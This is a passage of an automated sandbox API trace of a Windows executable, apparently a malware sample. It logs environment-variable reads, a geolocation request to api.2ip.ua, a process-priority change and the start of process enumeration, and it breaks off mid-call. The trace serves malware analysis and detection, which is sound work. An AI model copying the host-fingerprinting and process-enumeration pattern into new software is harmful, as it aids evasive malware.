lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0054.798] GetLastError () returned 0x0 [0054.799] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x4c [0054.799] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x50) returned 0x241360 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0054.799] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x12) returned 0x2412a0 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x2412a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0054.799] GetLastError () returned 0x0 [0054.799] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x50 [0054.799] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x54) returned 0x241360 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0054.799] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x18) returned 0x2412c0 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x2412c0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0054.799] GetLastError () returned 0x0 [0054.799] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x54 [0054.799] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x58) returned 0x241360 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0054.799] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1b) returned 0x23f6c0 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x23f6c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0054.799] GetLastError () returned 0x0 [0054.799] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x58 [0054.799] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x5c) returned 0x241360 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0054.799] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x24) returned 0x23aee0 [0054.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x23aee0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0054.799] GetLastError () returned 0x0 [0054.800] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x5c [0054.800] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x60) returned 0x241360 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0054.800] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x29) returned 0x23b5b8 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x23b5b8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0054.800] GetLastError () returned 0x0 [0054.800] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x60 [0054.800] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x64) returned 0x241360 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0054.800] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1e) returned 0x23f6e8 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x23f6e8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0054.800] GetLastError () returned 0x0 [0054.800] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x64 [0054.800] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x68) returned 0x241360 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0054.800] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x41) returned 0x2370a0 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x2370a0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0054.800] GetLastError () returned 0x0 [0054.800] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x68 [0054.800] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x6c) returned 0x241360 [0054.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0054.800] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x17) returned 0x2413d8 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x2413d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0054.801] GetLastError () returned 0x0 [0054.801] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x6c [0054.801] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x70) returned 0x241360 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0054.801] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xf) returned 0x23ec50 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x23ec50, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0054.801] GetLastError () returned 0x0 [0054.801] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x70 [0054.801] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x74) returned 0x2413f8 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0054.801] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x16) returned 0x241360 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x241360, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0054.801] GetLastError () returned 0x0 [0054.801] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x74 [0054.801] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x78) returned 0x2413f8 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0054.801] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2a) returned 0x23b5f0 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x23b5f0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0054.801] GetLastError () returned 0x0 [0054.801] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x78 [0054.801] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x7c) returned 0x2413f8 [0054.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0054.801] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x29) returned 0x23b628 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x23b628, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0054.802] GetLastError () returned 0x0 [0054.802] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x7c [0054.802] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x80) returned 0x2413f8 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0054.802] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x15) returned 0x241380 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x241380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0054.802] GetLastError () returned 0x0 [0054.802] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x80 [0054.802] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x84) returned 0x2413f8 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0054.802] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1e) returned 0x23f710 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x23f710, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0054.802] GetLastError () returned 0x0 [0054.802] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x84 [0054.802] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x88) returned 0x2413f8 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0054.802] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2a) returned 0x23b660 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x23b660, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0054.802] GetLastError () returned 0x0 [0054.802] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x88 [0054.802] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x8c) returned 0x2413f8 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0054.802] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x12) returned 0x2413a0 [0054.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2413a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0054.802] GetLastError () returned 0x0 [0054.803] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x8c [0054.803] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x90) returned 0x2413f8 [0054.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0054.803] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x18) returned 0x241490 [0054.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x241490, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0054.803] GetLastError () returned 0x0 [0054.803] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2413f8) returned 0x90 [0054.803] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2413f8, Size=0x94) returned 0x2414b0 [0054.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0054.803] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x46) returned 0x2370f0 [0054.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2370f0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0054.803] GetLastError () returned 0x0 [0054.803] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2414b0) returned 0x94 [0054.803] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2414b0, Size=0x98) returned 0x2414b0 [0054.803] GetLastError () returned 0x0 [0054.877] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.945] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.946] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.952] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x8ec) returned 0x241fd0 [0054.982] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.982] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x10) returned 0x23ec68 [0054.983] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.983] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.983] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0055.021] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0055.061] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0060.851] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x40) returned 0x236018 [0060.851] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0084.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ba58, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e258 | out: lpBuffer=0x18ba58*, lpdwNumberOfBytesRead=0x18e258*=0x1d0) returned 1 [0084.928] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0084.932] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0084.938] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x20) returned 0x24dda8 [0084.950] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x1e0) returned 0x32cff10 [0084.965] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32cff10 | out: hHeap=0x220000) returned 1 [0084.973] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x24dda8 | out: hHeap=0x220000) returned 1 [0084.973] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x220000) returned 1 [0084.979] GetCurrentProcess () returned 0xffffffff [0084.979] GetLastError () returned 0x2 [0084.979] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0084.985] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x10) returned 0x2725b8 [0084.990] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x8ec) returned 0x32d7bd8 [0084.996] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x800) returned 0x27f0e8 [0084.996] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27f0e8, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xa5 [0084.996] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0085.001] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x810) returned 0x32d84d0 [0085.002] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" " [0085.002] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" ", pNumArgs=0x18e338 | out: pNumArgs=0x18e338) returned 0x24ef88*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.002] lstrcpyW (in: lpString1=0x18efc8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.008] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" " [0085.008] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" ", pNumArgs=0x18e2d4 | out: pNumArgs=0x18e2d4) returned 0x24ef88*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.009] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0085.009] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0085.009] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0085.010] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0085.010] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0085.010] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0085.054] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0085.054] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0085.054] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0085.054] EnumProcesses (in: lpidProcess=0x183ad0, cb=0xa000, lpcbNeeded=0x18e2e0 | out: lpidProcess=0x183ad0, lpcbNeeded=0x18e2e0) returned 1 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, 